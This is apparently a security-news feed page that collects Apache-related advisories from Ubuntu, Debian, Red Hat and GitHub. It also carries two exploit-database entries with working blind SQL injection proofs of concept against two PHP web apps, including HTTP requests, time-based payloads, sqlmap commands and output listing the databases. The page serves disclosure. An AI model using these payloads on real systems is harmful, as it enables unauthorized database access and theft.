Ubuntu Security Notice 5942-2 - USN-5942-1 fixed vulnerabilities in Apache HTTP Server. This update provides the corresponding update for CVE-2023-25690 for Ubuntu 16.04 ESM. Lars Krapf discovered that the Apache HTTP Server mod_proxy module incorrectly handled certain configurations. A remote attacker could possibly use this issue to perform an HTTP Request Smuggling attack.

==========================================================================  
Ubuntu Security Notice USN-5942-2  
March 22, 2023

apache2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Apache HTTP Server could allow unintended access to network services.

Software Description:  
- apache2: Apache HTTP server

Details:

USN-5942-1 fixed vulnerabilities in Apache HTTP Server. This update  
provides the corresponding update for CVE-2023-25690 for Ubuntu 16.04 ESM.

Original advisory details:

  Lars Krapf discovered that the Apache HTTP Server mod_proxy module  
  incorrectly handled certain configurations. A remote attacker could  
  possibly use this issue to perform an HTTP Request Smuggling attack.  
  (CVE-2023-25690)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   apache2                         2.4.18-2ubuntu3.17+esm10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5942-2  
   https://ubuntu.com/security/notices/USN-5942-1  
   CVE-2023-25690

Ubuntu Security Notice USN-5942-2

When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.

**Apache Tomcat vulnerable to Unprotected Transport of Credentials**

Moderate severity GitHub Reviewed Published Mar 22, 2023 to the GitHub Advisory Database • Updated Mar 22, 2023

GHSA-2c9m-w27f-53rm: Apache Tomcat vulnerable to Unprotected Transport of Credentials

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-28708

Debian Linux Security Advisory 5376-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5376-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : apache2CVE ID         : CVE-2006-20001 CVE-2022-36760 CVE-2022-37436 CVE-2023-25690                 CVE-2023-27522Multiple vulnerabilities have been discovered in the Apache HTTP server,which may result in HTTP response splitting or denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 2.4.56-1~deb11u1.We recommend that you upgrade your apache2 packages.For the detailed security status of apache2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/apache2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQYqdQACgkQEMKTtsN8TjYWeQ//dwKUtLc9oKmjEmiY1QsRsSYdlzMTWA8ow63vdtGD1QU3Xb/CxPSZ22Oh8zypNP5qtk3m11JA7npd7RNPpF3Gb1V5ebIlKP7GavGBIrGOmvH31hV3IUP4HoXO/mC36BA3twAgyF12HMtdPvj+qaNguYnxXhc02Kt7kl6sq+ybtdCnRnBfJJ2KYXKqtjRedc+HJZa0gSuq9fsFbaQF1OPk1jHEO/ixHhISKhEr1mHO+eLN3soQ9gqaEG/a/0jLUm1ThiBNeK5jkmCXuIuqwwrGHG16Cl9fIKGps1Yb+ef2aJca7onA4IfyUj1d1S7VmCgFFQe+5eAgdcR77mWS8RyEP/lyItY+ifzGG6xR0EUnDgD7ApcqhZBIJCgU583Dle+sjvwgb9iSSeNwynqx58Pf4648AJSx6nNlsop4ekE4To5GvKyr/eI3HNqat9BfVtwqRu4GnnurvJFzh5n2wpRl1JbQMFMx/kxb1He5ioayRtru9guViNA3ylgnd7lbk8FEsvvzS9MM0RVivlWdzD6+FVFHaWoCcwzv+0dFD6iiG5MJMGUr0pElw+juAs6bnKCCoEHU4HK0rKHlVeB6E3Ch7yF+b6PvzZqCqcOE6RB5/I2Nu9S3L78cZWRUnKXf/WHf3Lw+DCB8QKWUBuo0WjkFjmEe/oUCWHGt/UbtXGbSM+E=Bi/w-----END PGP SIGNATURE-----

Debian Security Advisory 5376-1

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger. This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

**Apache Sling Resource Merger has Excessive Iteration vulnerability**

High severity GitHub Reviewed Published Mar 20, 2023 to the GitHub Advisory Database • Updated Mar 20, 2023

GHSA-rwrx-x2hw-9h5w: Apache Sling Resource Merger has Excessive Iteration vulnerability

101+ News Portal version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: 101+ News Portal - SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. ## Request PoC```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/multi]└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2                                           ---snip---POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:---Parameter: searchtitle (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- ----[18:01:02] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[18:01:02] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] newsportal[*] performance_schema[*] phpmyadmin---snip---```

101+ News Portal 1.0 SQL Injection

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger.This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

CVE-2023-26513

Red Hat Security Advisory 2023-1286-01 - Migration Toolkit for Runtimes 1.0.2 Images. Issues addressed include denial of service, privilege escalation, and server-side request forgery vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Migration Toolkit for Runtimes security bug fix and enhancement update  
Advisory ID:       RHSA-2023:1286-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1286  
Issue date:        2023-03-16  
CVE Names:         CVE-2021-46848 CVE-2022-2056 CVE-2022-2057   
                   CVE-2022-2058 CVE-2022-2519 CVE-2022-2520   
                   CVE-2022-2521 CVE-2022-2867 CVE-2022-2868   
                   CVE-2022-2869 CVE-2022-2953 CVE-2022-4415   
                   CVE-2022-31690 CVE-2022-35737 CVE-2022-40303   
                   CVE-2022-40304 CVE-2022-41966 CVE-2022-42010   
                   CVE-2022-42011 CVE-2022-42012 CVE-2022-43680   
                   CVE-2022-46364 CVE-2022-47629 CVE-2023-21835   
                   CVE-2023-21843   
=====================================================================

1. Summary:

Migration Toolkit for Runtimes 1.0.2 release

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Migration Toolkit for Runtimes 1.0.2 Images

Security Fix(es):

* spring-security-oauth2-client: Privilege Escalation in  
spring-security-oauth2-client (CVE-2022-31690)

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* Apache CXF: SSRF Vulnerability (CVE-2022-46364)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2162200 - CVE-2022-31690 spring-security-oauth2-client: Privilege Escalation in spring-security-oauth2-client  
2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow

5. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-2056  
https://access.redhat.com/security/cve/CVE-2022-2057  
https://access.redhat.com/security/cve/CVE-2022-2058  
https://access.redhat.com/security/cve/CVE-2022-2519  
https://access.redhat.com/security/cve/CVE-2022-2520  
https://access.redhat.com/security/cve/CVE-2022-2521  
https://access.redhat.com/security/cve/CVE-2022-2867  
https://access.redhat.com/security/cve/CVE-2022-2868  
https://access.redhat.com/security/cve/CVE-2022-2869  
https://access.redhat.com/security/cve/CVE-2022-2953  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-31690  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBMyj9zjgjWX9erEAQjYeQ//UuRPtn96y1y86Oy3h22AOmgbhm+14j0E  
QdVf/7R+cdOrhTh/U8Q0J+TyB69aqqFkPkt13hK55C6/GR+BF3hxsmEeYPEU09XA  
4b0lfu9Wx+o707zPB6PRhMA8nNAnXfkeu9LNGSHY/jLBug6KXSlyQ9/h0HWB4j19  
xFdUUlfW2wDjzV8j697garKk6oGY+3VOMF3RbD35EWCSOdLrX3aY+tsqunk0dCMJ  
GE7uHxqoDtYNWnQAQnd4gCydhl1RRGq2tzY1OClEZ4/zpFQWs3nLIkeUCGs+mCfk  
gp8tz+/zyytxSa/Oweak6Z50UC2qlYonPAH8883E181un0vq2NMeJdNlBzPnlO3P  
ebUZgoS1jE07BN/rack9NBUjnTQ8t/vpeDavjjhQPgjsiSUcrQwSR4YhckbKz07B  
muvOo6vz645punZ+BwYMvjT9XAR9Tx5JfuureeQOVvi3iiGgiR4cfreKXX/Xt2gh  
/7ALcDeV05P41SN6d+z7fvEaXpdYwSs2H4Wbf+oEpV9FUockEElrYSOYrZVQ6Muh  
H6m/hboerV8SBn3JrM3egj+sXZw4pCitrotFQB1HM6/duS5uY0m0dDAaCR8DCJcL  
qV6cNHOBjtXYAxxextdcrbF+IwoGWDrOuifIL2OSQgT/Qvh0AaSAWe+FCNPHfIJY  
MW3fEoqdc88=  
=4fmY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1286-01

Red Hat Security Advisory 2023-1285-01 - Migration Toolkit for Runtimes 1.0.2 ZIP artifacts. Issues addressed include privilege escalation, server-side request forgery, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Migration Toolkit for Runtimes security bug fix and enhancement update  
Advisory ID:       RHSA-2023:1285-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1285  
Issue date:        2023-03-16  
CVE Names:         CVE-2022-3782 CVE-2022-31690 CVE-2022-46364   
=====================================================================

1. Summary:

Migration Toolkit for Runtimes 1.0.2 release

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Migration Toolkit for Runtimes 1.0.2 ZIP artifacts

Security Fix(es):

* keycloak: path traversal via double URL encoding (CVE-2022-3782)

* spring-security-oauth2-client: Privilege Escalation in  
spring-security-oauth2-client (CVE-2022-31690)

* Apache CXF: SSRF Vulnerability (CVE-2022-46364)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding  
2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2162200 - CVE-2022-31690 spring-security-oauth2-client: Privilege Escalation in spring-security-oauth2-client

5. References:

https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-31690  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes&downloadType=distributions

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBLeC9zjgjWX9erEAQhOgxAAk/jRsjkrCxiJurClPSOMhcoTrWW8klIH  
2YdMia9aPsx2g8qkN7VVUflIu5EoQArGMYqicWAfp5FjkTu7zCCk+VTGjJlScxzD  
07tv3ZllsNG8HAmQPiUfbwiAcqS6p0TGhCqbR6qusVnhSOW3S7n817IX2dVkPWOM  
z8/J7UpG0ewJX+DTZ7sFCv6QfJTN5hbKZMks6OsWRl3H4Xo0PCt9S/KK2tXNQTsi  
kJz06WMN+AcCMYzy7BrdFdbMNpWuY7VHBUeK074Awc+18+LMD4Ed/qiCMoYVxn2K  
ui2O9ldlLzT6OQerKHdWhcAYHNk/yh7ufFgznte4e0ePDsVEK/7q4NLCzLjFd1S5  
n4weYCtg7BUGj4oR0hNEq/2eejarh6PBxP0rGYW/uIPP3Kfge2gz8KNRPIvCDcy0  
4C0DrFTxcN3mcYNTawso6EgUDqsJNtOLykwgOjhYb5Re59PU4T+7FFHZW+xPuJMQ  
bzBk2u0Z0PUKyh8UTPCdoLC06I6tpUGkKKwMEVO0VVg7l0QP8m/oHj35gnIgKrVl  
vMzJNkRBK48pU57E6Ps1rDOA7/JiNwieuD2QoJuQRGo+Z98L3VZzSIUvtyjy4+Rj  
4y1H1ttN02I3lwbPCtEBE2qu6R24karIVJtyLV1x4QsfLnyINiFm4upf2eEInVU3  
w4QAo3uuIhA=  
=pwgJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1285-01

Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands by "id" parameter. ## Request PoC```GET /php-opos/index.php?page=category&id=1' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "id" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2---snip---[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=category&id=1' AND 9957=9957-- dMoW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: page=category&id=-1987' UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- ----[13:20:45] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.2.0back-end DBMS: MySQL >= 5.0 (MariaDB fork)[13:20:45] [INFO] fetching database names[13:20:45] [INFO] retrieved: 'information_schema'[13:20:46] [INFO] retrieved: 'mysql'[13:20:46] [INFO] retrieved: 'opos_db'[13:20:46] [INFO] retrieved: 'performance_schema'[13:20:46] [INFO] retrieved: 'phpmyadmin'----snip----```

Tag

#apache